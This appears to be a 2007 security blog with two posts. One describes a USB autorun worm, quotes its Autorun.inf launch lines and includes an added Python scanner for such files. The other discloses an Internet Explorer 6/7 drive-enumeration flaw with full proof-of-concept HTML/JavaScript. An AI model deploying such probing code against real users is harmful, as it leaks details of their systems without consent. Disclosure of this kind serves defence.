Tuesday, July 24, 2007

Is it that easy to write desktop worms?

Some days ago, a friend of mine wanted a few documents from me, so I plugged his pen-drive into the USB slot. As the next obvious step, I opened the drive, and strange things started happening on my computer.


First of all, I saw an executable file whose icon looked like that of a normal directory. Its name was MicrosoftPowerPoint.exe. Note that I only noticed the extension because, luckily, I keep the 'Hide extensions for known file types' option off. The other reason I noticed it was that I had the 'Show all files' and 'Show system files' options on.


Next, I saw an alert with some strange text on it. Now this was clearly a sign of my computer being infected with some evil code. I quickly opened the pen-drive in Explorer and noticed an Autorun.inf file! This was the root cause of the whole problem.

It contained the following lines:

open=MicrosoftPowerPoint.exe

shellexecute=MicrosoftPowerPoint.exe

shell\Auto\command=MicrosoftPowerPoint.exe


Clearly, as soon as you (or the system) opened the drive, the executable ran silently and did all the work. When I deleted the inf file and the exe file from the drive, they reappeared: clearly a sign of something resident in memory.
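The three Autorun.inf directives quoted above are exactly the ones that make Explorer launch a program when a drive is opened. As an added example (not code from the original post), here is a small Python triage routine that scans an Autorun.inf for those auto-launch keys and reports the program each one points at; the sample file is constructed from the lines quoted in the post, with a harmless icon line added for contrast.

```python
import re

# Keys that make Explorer/AutoPlay run a program when the drive is opened.
# "shell\<verb>\command" is matched by pattern because the verb name
# ("Auto" in the post) is chosen by whoever wrote the file.
AUTO_EXEC_KEYS = {"open", "shellexecute"}
SHELL_COMMAND_RE = re.compile(r"^shell\\[^\\]+\\command$", re.IGNORECASE)

# Constructed sample: the three lines quoted in the post plus an icon line.
SAMPLE_AUTORUN_INF = """\
[autorun]
open=MicrosoftPowerPoint.exe
shellexecute=MicrosoftPowerPoint.exe
shell\\Auto\\command=MicrosoftPowerPoint.exe
icon=drive.ico
"""


def find_autorun_launchers(text):
    """Return (key, command) pairs that would auto-launch a program.

    Parsed by hand rather than with configparser: keys contain backslashes,
    and real-world files sometimes omit the [autorun] section header.
    """
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#", "[")) or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if key.lower() in AUTO_EXEC_KEYS or SHELL_COMMAND_RE.match(key):
            findings.append((key.lower(), value))
    return findings


def describe(findings):
    """One-line verdict suitable for a scan report."""
    if not findings:
        return "no auto-launch entries"
    targets = sorted({value.lower() for _, value in findings})
    keys = ", ".join(key for key, _ in findings)
    return "auto-launches %s via %s" % (", ".join(targets), keys)


if __name__ == "__main__":
    print(describe(find_autorun_launchers(SAMPLE_AUTORUN_INF)))
```

An Autorun.inf that only sets icon or label produces no findings, so the routine distinguishes the benign use of the file from the self-launching kind described here.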

Fortunately (?), the alert popped up again, and thus I was able to locate the exact process that was carrying out the whole operation. It was svchost. Under normal circumstances you see multiple instances of it in the task manager; the thing different about this one was that it ran under my own user name. I quickly killed the process and deleted the two evil files on the pen drive.


As I had suspected, on rebooting my computer the alerts were seen again. After looking at the registry, I figured out that the worm had created a start-up entry on the system. It had copied itself to c:\heap41a.


On searching the internet for heap41a, I found the whole description of the worm.


Lessons learnt:

  1. Pen drives are dangerous!
  2. Never log in as a privileged user when using such devices.
  3. Never trust your antivirus (I have the free edition of AVG, fully updated).
  4. Inf files are 'BAD'.
  5. Propagating such worms is as easy as spreading ajax worms (? Any thoughts)

Luckily, the worm did not do anything evil I suppose. But you may not get so lucky.

Thursday, July 05, 2007

IE - Guessing The Names Of The Fixed Drives On Your Computer

DEMO

While doing experiments with IE I observed another weird behavior. When I created an anchor tag with href="a:crap", the progress bar at the bottom of IE showed "file:///a:crap". Now this is interesting: why would IE even try to guess the protocol unnecessarily?
I went ahead with a new experiment and created iframes with src = a:crap. This time I got a 'page could not be displayed' error message.

Accidentally, I tried c:crap, and this time I saw a blank frame. Now I realized that something was special about c:

An onerror handler did not tell me whether the frame was blank or an error page, so the next thing was to try to read the content of the window. On reading the error page frame, I got an exception. But on the c: frame, which was blank, no exception was observed.

Then, after brute-forcing all 26 letters, it was observed that only a few drive letters passed the test. The floppy drives and CD drives also threw exceptions. And so enumerating all the fixed drive letters was simple.


Here is the source:




<html>
<head>
<title>Determining Fixed Hard Drives On Your Computer</title>
<!-- quoted CSS lengths are invalid; explicit px units give the tiny frames intended -->
<style type="text/css">iframe { width: 30px; height: 20px; }</style>
<script>
var cnt = 0, result = '';
var drives = [];
// candidate drive letters a..z
for (var j = 0; j < 26; j++) {
    drives[j] = String.fromCharCode(j + 97);
}
// onload handler shared by all iframes; once all 26 have fired, inspect them
function loaded() {
    cnt++;
    if (cnt == 26) {
        allFramesLoaded();
        alert('You have the following Fixed Drives : \n' + result.toUpperCase());
    }
}
function allFramesLoaded() {
    for (var i = 0; i < 26; i++) {
        try {
            // a blank frame (existing fixed drive) can be read; the error page
            // shown for a missing drive, floppy or CD throws on access
            var k = window.frames[i].document;
            result = result + drives[i] + ",";
        } catch (e) {
        }
    }
}
function addIFrames() {
    // only run when the page is requested with ?test=true
    if (document.location.href.indexOf('test=true') < 0)
        return;
    for (var j = 0; j < 26; j++) {
        var f = document.createElement("iframe");
        // attachEvent is IE-specific; the demo targets IE 6/7
        f.attachEvent('onload', loaded);
        f.src = drives[j] + ':' + 'crap';
        document.body.appendChild(f);
    }
}
</script>
</head>
<body onload='addIFrames()'></body>
</html>



(Demo hosted by Mario)

Tested on IE 6/7